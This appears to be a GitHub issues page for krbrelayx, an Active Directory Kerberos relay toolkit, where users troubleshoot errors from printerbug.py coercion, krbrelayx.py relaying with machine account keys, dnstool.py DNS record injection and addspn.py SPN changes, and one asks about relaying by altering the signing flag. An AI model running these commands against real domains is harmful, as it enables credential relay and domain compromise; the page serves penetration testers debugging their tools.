
krbrelayx's People

Contributors

0x5ecf4ult, 4ndr34z, dirkjanm, i128, laxa, lz1y, mrale98, pm-syn, ramzeth, rtpt-erikgeiser, shutdownrepo, tw1sm

krbrelayx's Issues

python3.8 compatibility issue: TypeError: Missing required parameter 'digestmod'.

dnstool no longer runs with python 3.8

[-] Connecting to host...
[-] Binding to host
Traceback (most recent call last):
  File "./dnstool.py", line 536, in <module>
    main()
  File "./dnstool.py", line 364, in main
    if not c.bind():
  File "/usr/local/lib/python3.8/dist-packages/ldap3/core/connection.py", line 563, in bind
    response = self.do_ntlm_bind(controls)
  File "/usr/local/lib/python3.8/dist-packages/ldap3/core/connection.py", line 1302, in do_ntlm_bind
    request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client, result['server_creds'])
  File "/usr/local/lib/python3.8/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
    server_creds = name.create_authenticate_message()
  File "/usr/local/lib/python3.8/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
    nt_challenge_response = self.compute_nt_response()
  File "/usr/local/lib/python3.8/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
    response_key_nt = self.ntowf_v2()
  File "/usr/local/lib/python3.8/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
    return hmac.new(password_digest, (self.user_name.upper() + self.user_domain).encode('utf-16-le')).digest()
  File "/usr/lib/python3.8/hmac.py", line 153, in new
    return HMAC(key, msg, digestmod)
  File "/usr/lib/python3.8/hmac.py", line 51, in __init__
    raise TypeError("Missing required parameter 'digestmod'.")
TypeError: Missing required parameter 'digestmod'.

Printer bug doesn't work

Hello, help me please; I have read the blog.
Use secretsdump, get the machine account (computer.test.com) aes256 key & lm:ntlm hashes;
Add dns A record for my attacker machine. For ex. attacker.test.com
python krbrelayx.py -aesKEY "aes256key"
python printerbug.py -hashes lm:ntlm test.com/[email protected] attacker.test.com
printerbug output:
[*] Attempting to trigger authentication via rprn RPC at primary-dc.test.com
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked

krbrelayx output:
Procotol client ldaps loaded..
Procotol client ldap loaded..
Procotol client smb loaded..

SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'
SMBD: Received connection from "ip address primary-dc.test.com"
Unsupported MechType 'NTLMSSP - MICROSOFT NTLM Security Support Provider'

Computer.test.com =Windows 7
primary-dc.test.com = Windows 2012 server
attacker.test.com = kali

RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE while executing printerbug.py script

Hello,

I'm getting the following error with one of the servers with unconstrained delegation. Checked and confirmed that RPC is started and running on the server. Tried switching off the firewall as well.

python printerbug.py -hashes domain/machine account$@hostname test.domain

[*] Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Attempting to trigger authentication via rprn RPC at
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.
[*] Triggered RPC backconnect, this may or may not have worked

python krbrelayx.py -aesKey <>

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk)
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 192.168.0.1
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 192.168.0.1

Could you please guide me on what could be wrong? Is it something related to the impacket version I'm using?

Question/Feature: Relaying DNS and HTTP Authentication to LDAP By Modifying the Client Integrity Flag

I wanted to say first this is a great tool, I use it all the time, and I appreciate all the work and research that went into it!

Overall, my question is about whether it's possible to relay DNS, HTTP, or other authentication that maps implicitly to the HOST class to high value services that also map to the HOST class (ideally LDAP or SMB if they do) and don't require signing by modifying the value of the client's integrity flag.

My question harkens back to a couple statements you made in part two of your Kerberos relaying articles:

  1. You can't relay DNS authentication to LDAP because the flag that requests integrity (signing) is set by the client.
  2. You can relay DNS authentication to HTTP because it ignores the flag and both services map to the HOST class.

Part 1: Is it possible to relay any service that maps to the HOST class to services where signing is optional (again I'm thinking LDAP and SMB) by sniffing, modifying, and relaying traffic between a victim and a target and specifically modifying the value of the integrity flag so the client is not requesting signing? This is my understanding of what Krbjack is doing here: https://github.com/almandin/krbjack/blob/d4bdd9a3b61303eda5dbc614f3448a8b469c0e53/krbjack/tcpforward.py#L37

Part 2: You say in your article 'many' services map to the HOST class. Do you know of a list of services that do this? I'm wondering specifically about those with obvious attacks that lead to privilege escalation (like SMB or LDAP) but also others. I couldn't find a list of all the services that map to the HOST class anywhere, including in the referenced project zero articles.

If my understanding is correct and there are high value services that map to the HOST class and don't require signing by default, then relaying to these services is a feature I would like to see and would do my best to help implement. Thanks!

Could not modify object, the server reports insufficient rights

When relaying a printerbug.py connection from one domain controller to another I get to the end of the attack and am met with the following message:

[-] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-03150E49, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

I attempted to perform the attack against ldap (specifying an existing computer account) and ldaps. I am led to believe that this means these domain controllers are not vulnerable and have likely been patched.

Is this assumption correct? I just wanted to double check because it seems odd that I can drop the mic successfully but cannot modify computer/user objects.

Either way- thanks for putting together these attacks!

Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider

Hello Dirk,

I get the "Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider" in the last step when I try to authenticate with printer-bug and DFSCoerce. I could not find what the issue was. I have followed the below steps.

  1. DC - 2016
  2. Attacker- Kali
  3. Unconstrained delegation machine- Windows 10

Step - 1
I got the AES-256 and 128 as well as NTHash of the machine account by running secretsdump.py

Step - 2
Queried for the SPN

image

Step - 3
Added SPN record
image

Step - 4
Added DNS record
image

Step-5
A record
image

Step- 6
nslookup verification
image

Step - 7
Printer Bug

image

DFSCoerce
image

Step - 8
Krbrelayx setup

image

Ultimately, I got the 'NTLMSSP - Microsoft NTLM Security Support Provider' error.

I could not figure out what the issue is.

"Could not find the correct encryption key! Ticket is encrypted with keytype 18, but keytype(s) were supplied"

Hi,

I can successfully perform the ADCS attack that you describe here. However, once I try for example targeting LDAPS on a DC in order to add a computer account it always fails with the error "Could not find the correct encryption key! Ticket is encrypted with keytype 18, but keytype(s) were supplied".

This is how I configure mitm6:
mitm61

After this I disable then reenable the NIC on the machine I MITM using mitm6 (client1.adlab.local/10.0.0.210) in order for the machine to be MITM.

This is how I trigger a Kerberos authentication on the machine I MITM using mitm6 (client1.adlab.local/10.0.0.210):
mitm63

This is how I configure krbrelayx and the error I get:
mitm62

The DC is running a fully patched Server 2019 and the client is running a fully patched Windows 10.

Is this a bug or am I doing something wrong?

Connection reset by peer when adding a DNS record with dnstool.py

Hello,

here is what happens when I try adding a record using dnstool.py (of course replacing the values for DOMAIN, USER, PASSWORD):

python3 /opt/krbrelayx/dnstool.py -u 'DOMAIN\USER' -p 'PASSWORD' --record 'kali' --action add --data 192.168.50.59 SRV-AD-02

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/sync.py", line 82, in receiving
    data = self.connection.socket.recv(self.socket_size)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/opt/krbrelayx/dnstool.py", line 610, in <module>
    main()
  File "/opt/krbrelayx/dnstool.py", line 538, in main
    c.add(record_dn, ['top', 'dnsNode'], node_data)
  File "/usr/local/lib/python3.11/dist-packages/ldap3/core/connection.py", line 987, in add
    response = self.post_send_single_response(self.send('addRequest', request, controls))
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/sync.py", line 121, in post_send_single_response
    responses, result = self.get_response(message_id)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/base.py", line 356, in get_response
    responses = self._get_response(message_id, timeout)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/sync.py", line 157, in _get_response
    responses = self.receiving()
                ^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/ldap3/strategy/sync.py", line 92, in receiving
    raise communication_exception_factory(LDAPSocketReceiveError, type(e)(str(e)))(self.connection.last_error)
ldap3.core.exceptions.LDAPSocketReceiveError: error receiving data: [Errno 104] Connection reset by peer

After that, I am not able to make a simple connection to the DC using cme/nxc...

It is the use of dnstool.py that creates this situation, no other tool does that. What could I provide you with to help you troubleshoot?

TypeError: initConnection() takes 1 positional argument but 3 were given

I am getting the following error when trying kerberos relaying:

[*] DNS: Client sent authorization

Exception happened during processing of request from ('10.191.128.155', 53073)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 683, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 747, in __init__
    self.handle()
  File "/home/ubuntu/krbrelayx/lib/servers/dnsrelayserver.py", line 54, in handle
    self.do_relay(authdata)
  File "/home/ubuntu/krbrelayx/lib/servers/dnsrelayserver.py", line 68, in do_relay
    client.initConnection(authdata, self.server.config.dcip)
TypeError: initConnection() takes 1 positional argument but 3 were given
----------------------------------------

For the sake of completeness, I have installed the latest impacket, ldap3, dnspython and pulled the most recent krbrelayx.

I appreciate greatly any hints or tips on this.

AttributeError: 'Resolver' object has no attribute 'resolve'

Help!

I have all the dependencies installed. But it is not working as expected.
I am getting the following error

dnstool.py -u intelligence\\Tiffany.Molina -p SOMEPASSWORD --action add --record web-kali --data 10.10.17.81 --type A intelligence.htb

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
Traceback (most recent call last):
  File "dnstool.py", line 543, in <module>
    main()
  File "dnstool.py", line 465, in main
    record = new_record(addtype, get_next_serial(args.host, zone,args.tcp))
  File "dnstool.py", line 242, in get_next_serial
    res = dnsresolver.resolve(zone, 'SOA',tcp=tcp)
AttributeError: 'Resolver' object has no attribute 'resolve'

why is that

[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
Traceback (most recent call last):
  File "/root/桌面/krbrelayx-master/krbrelayx.py", line 261, in <module>
    main()
  File "/root/桌面/krbrelayx-master/krbrelayx.py", line 241, in main
    c = start_servers(options, threads)
  File "/root/桌面/krbrelayx-master/krbrelayx.py", line 97, in start_servers
    s = server(c)
  File "/root/桌面/krbrelayx-master/lib/servers/smbrelayserver.py", line 89, in __init__
    self.server = SMBSERVER((config.interfaceIp,445), config_parser = smbConfig)
  File "/usr/lib/python3/dist-packages/impacket/smbserver.py", line 3941, in __init__
    socketserver.TCPServer.__init__(self, server_address, handler_class)
  File "/usr/lib/python3.9/socketserver.py", line 452, in __init__
    self.server_bind()
  File "/usr/lib/python3.9/socketserver.py", line 466, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 99] Cannot assign requested address

ADDSPN error

Hello,
I'm getting the following error when trying to run the addspn.py script on the host with unconstrained delegation

python addspn.py -u <machine account$> -p -s HOST/test.internal.corp -q DC

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
Traceback (most recent call last):
  File "addspn.py", line 144, in <module>
    main()
  File "addspn.py", line 104, in main
    from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
ImportError: No module named ldaptypes

python3 addspn.py -u <machine account$> -p -s HOST/test.internal.corp -q DC
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
Traceback (most recent call last):
  File "addspn.py", line 144, in <module>
    main()
  File "addspn.py", line 104, in main
    from impacket.ldap.ldaptypes import SR_SECURITY_DESCRIPTOR
  File "", line 983, in _find_and_load
  File "", line 963, in _find_and_load_unlocked
  File "", line 906, in _find_spec
  File "", line 1280, in find_spec
  File "", line 1254, in _get_spec
  File "", line 1235, in _legacy_get_spec
  File "", line 441, in spec_from_loader
  File "", line 594, in spec_from_file_location
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.19-py3.7.egg/impacket/ldap/ldaptypes.py", line 192
    GENERIC_READ = 0x80000000L
                             ^
SyntaxError: invalid syntax

Using impacket version 0.9.19

Tried installing the python dependencies
apt-get install libsasl2-dev python-dev libldap2-dev libssl-dev

and pip3 install pyldap

and pip3 install python-ldap

dnstool error

While I do succeed in creating new records with powermad, I am getting the following error with dnstool:

LDAP operation failed. Message returned from server: constraintViolation 000020B5: AtrErr: DSID-03152B47, #1: 0: 000020B5: DSID-03152B47, problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 9030e (objectCategory)

Is there a difference on how the records are set or PEBKAC?

ImportError: No module named targetsutils

The targetsutils.py is missing from the /lib/utils/ folder! So, when you run the krbrelayx.py you get the following error:

ImportError: No module named targetsutils

However, this can be easily resolved by copying impacket's targetsutils.py under your project's folder /lib/utils/.

Error running krbrelayx - problem with arguments

Using latest version of impacket, when running krbrelayx I get the following error

python krbrelayx.py
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk)
Traceback (most recent call last):
  File "krbrelayx.py", line 242, in <module>
    main()
  File "krbrelayx.py", line 222, in main
    c = start_servers(options, threads)
  File "krbrelayx.py", line 83, in start_servers
    c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user)
TypeError: setLDAPOptions() takes exactly 8 arguments (6 given)

Crash on Cyrillic domain

I got the following error when attempting a login with printerbug.py on a Cyrillic domain, is it possible this is related to this issue or am I completely wrong here? New to the Impacket library so forgive me if this is off base.

Issue in question: fortra/impacket#51

Output:

python printerbug.py DOMAIN\user:[email protected] attacker

[*] Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Attempting to trigger authentication via rprn RPC at machine.domain.local
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
Traceback (most recent call last):
  File "printerbug.py", line 198, in <module>
    main()
  File "printerbug.py", line 191, in main
    lookup.dump(remote_name)
  File "printerbug.py", line 77, in dump
    self.lookup(rpctransport, remote_host)
  File "printerbug.py", line 87, in lookup
    dce.connect()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 800, in connect
    return self._transport.connect()
  File "/usr/local/lib/python2.7/dist-packages/impacket/dcerpc/v5/transport.py", line 400, in connect
    self.__handle = self.__smb_connection.openFile(self.__tid, self.__filename)
  File "/usr/local/lib/python2.7/dist-packages/impacket/smbconnection.py", line 547, in openFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

Error with dnstool.py remove

Hi @dirkjanm,

Per our conversation...I am creating this issue. FYI, I first ran ldapdelete, which seemed to work perfectly:

[+] Bind OK
[-] Modifying record
[+] LDAP operation completed successfully

After I ran ldapdelete, I used remove and I got this error:

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Target has only one record, tombstoning it
Traceback (most recent call last):
  File "dnstool.py", line 536, in <module>
    main()
  File "dnstool.py", line 516, in main
    'dNSTombstoned': [(MODIFY_REPLACE, True)]})
  File "/usr/local/lib/python3.6/dist-packages/ldap3/core/connection.py", line 1140, in modify
    request = modify_operation(dn, changelist, self.auto_encode, self.server.schema if self.server else None, validator=self.server.custom_validator if self.server else None, check_names=self.check_names)
  File "/usr/local/lib/python3.6/dist-packages/ldap3/operation/modify.py", line 70, in modify_operation
    partial_attribute['vals'].setComponentByPosition(index, prepare_for_sending(validate_attribute_value(schema, attribute, value, auto_encode, validator, check_names=check_names)))
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/univ.py", line 1920, in setComponentByPosition
    value = componentType.clone(value=value)
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/base.py", line 376, in clone
    return self.__class__(value, **initializers)
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/univ.py", line 837, in __init__
    base.SimpleAsn1Type.__init__(self, value, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/base.py", line 267, in __init__
    value = self.prettyIn(value)
  File "/usr/local/lib/python3.6/dist-packages/pyasn1/type/univ.py", line 912, in prettyIn
    return bytes(value)
  File "/usr/local/lib/python3.6/dist-packages/impacket/structure.py", line 166, in __getitem__
    return self.fields[key]
KeyError: 0

Hopefully, I cleaned up my A record in the right order :). Thanks again for your help!
